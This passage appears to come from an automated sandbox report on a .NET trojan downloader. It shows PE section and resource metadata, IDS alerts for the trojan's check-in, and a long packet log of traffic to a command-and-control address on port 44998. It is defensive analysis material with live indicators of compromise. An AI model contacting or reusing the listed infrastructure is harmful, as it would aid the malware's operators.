                            .rsrc | 0x72000 | 0x68c | 0x800 | 467901400c844c9de380140ddca5fb1f | False | 0.37548828125 | data | 4.607550869331143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0x74000 | 0xc | 0x200 | ac4d1f497711cb30e60c49eb568d2ecc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_VERSION | 0x720a0 | 0x400 | MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4" | | | 0.439453125
                            RT_MANIFEST | 0x724a0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

                            DLL | Import
                            mscoree.dll | _CorExeMain

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            07/03/24-15:50:29.602801 | TCP | 2851746 | ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin | 49740 | 44998 | 192.168.11.20 | 147.185.221.18
                            07/03/24-15:50:31.680170 | TCP | 2851746 | ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin | 49741 | 44998 | 192.168.11.20 | 147.185.221.18
                            07/03/24-15:50:36.268137 | TCP | 2851746 | ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin | 49745 | 44998 | 192.168.11.20 | 147.185.221.18

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jul 3, 2024 15:50:29.909499884 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.909538031 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909567118 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909579039 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909588099 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.909670115 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.909670115 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:29.992321014 CEST4499849740147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:29.992521048 CEST4974044998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.278001070 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.448465109 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:30.448684931 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:30.893611908 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.321070910 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.473373890 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.680020094 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.680170059 CEST4974144998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:31.822155952 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:31.822326899 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.041107893 CEST4499849741147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.130105972 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.131041050 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.479752064 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:32.479876995 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:32.841752052 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.355454922 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.355479002 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.355662107 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.357925892 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.357939005 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.604851007 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.605057955 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.606528997 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.606534958 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.606918097 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.644206047 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.688196898 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.731127024 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731244087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731353045 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731395960 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731590986 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731605053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731698036 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731710911 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731723070 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731733084 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731743097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731754065 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731838942 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731880903 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731914043 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.731941938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731954098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731962919 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731973886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731985092 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.731996059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732034922 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732045889 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732057095 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732068062 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732078075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732089043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732099056 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732126951 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732129097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732131004 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732141018 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732147932 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732151985 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732162952 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732182026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732194901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732206106 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732215881 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732227087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732237101 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732248068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732258081 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732269049 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732278109 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732279062 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732290030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732299089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732310057 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732320070 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732434034 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732472897 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732490063 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732507944 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732522964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732541084 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:34.732629061 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.732713938 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:34.898840904 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.898978949 CEST44349742104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:34.899188042 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.900820017 CEST49742443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:34.901645899 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.039184093 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039268970 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039401054 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039416075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039427042 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039438009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039448977 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039520979 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039532900 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039721966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.039766073 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039819002 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039829969 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039931059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039943933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039954901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039964914 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039975882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.039985895 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040132046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040162086 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040162086 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040185928 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040199041 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040222883 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040235043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040292025 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040409088 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040427923 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040441036 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040452003 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040462971 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040473938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040484905 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040494919 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040505886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040517092 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040527105 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040538073 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040548086 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040559053 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040569067 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040580034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040590048 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040601015 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.040604115 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040657043 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040704966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.040838003 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.062714100 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.062886953 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347382069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347398043 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347409964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347556114 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347569942 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347580910 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347592115 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347599030 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347601891 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347613096 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347623110 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347785950 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.347862005 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347877026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.347950935 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348009109 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348021030 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348031044 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348042965 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348052979 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348062992 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348073959 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348084927 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348162889 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348167896 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348221064 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348246098 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348274946 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348301888 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348315001 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348356962 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348368883 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348382950 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348474979 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348634005 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348678112 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348725080 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348798990 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348853111 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348864079 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348875046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348886013 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348907948 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348918915 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348929882 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348953009 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348953962 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.348963976 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348973989 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348984957 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.348994970 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.349020958 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.350162983 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.350162983 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.511939049 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.633883953 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.651757002 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.652626038 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655199051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655213118 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655303001 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655317068 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655428886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655442953 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655453920 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655463934 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655474901 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655488014 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655555010 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655569077 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655580997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655591011 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655601978 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655636072 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655689955 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655786991 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655786991 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.655955076 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.655966997 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656013966 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656069040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656080008 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656090021 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656100988 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656121016 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656131983 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656137943 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656141996 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656152964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656162977 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656241894 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656275034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656286955 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656375885 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656385899 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656462908 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656471968 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656526089 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656553984 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656599045 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656651020 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656724930 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656779051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656797886 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656800985 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656810999 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.656904936 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.656981945 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.657515049 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657639027 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657748938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657761097 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657818079 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657829046 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657840014 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.657855034 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.658370018 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.752648115 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.752872944 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.752938032 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.871495008 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.878719091 CEST8049744104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:35.881849051 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:35.925061941 CEST4974480192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:35.963232040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:08.423933029 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:08.424108982 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:08.780261040 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:15.405699015 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:15.758913040 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:15.759141922 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:16.067759037 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:16.068686962 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:16.337559938 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:16.337842941 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:16.432728052 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:16.432951927 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:16.786236048 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:19.311163902 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:19.672467947 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:19.672739983 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:19.981900930 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:20.029587030 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:20.298321962 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:20.298444033 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:20.299369097 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:20.339901924 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:20.340071917 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:20.655534029 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:20.655698061 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:21.014317989 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:29.033880949 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:29.386260033 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:29.386532068 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:29.696046114 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:29.746170998 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:29.964421988 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:29.964628935 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:29.965600014 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:30.061012983 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:30.061229944 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:30.322388887 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:30.322586060 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:30.679052114 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:31.558465958 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:31.912102938 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:53:31.912262917 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:53:32.220006943 CEST4499849735147.185.221.18192.168.11.20
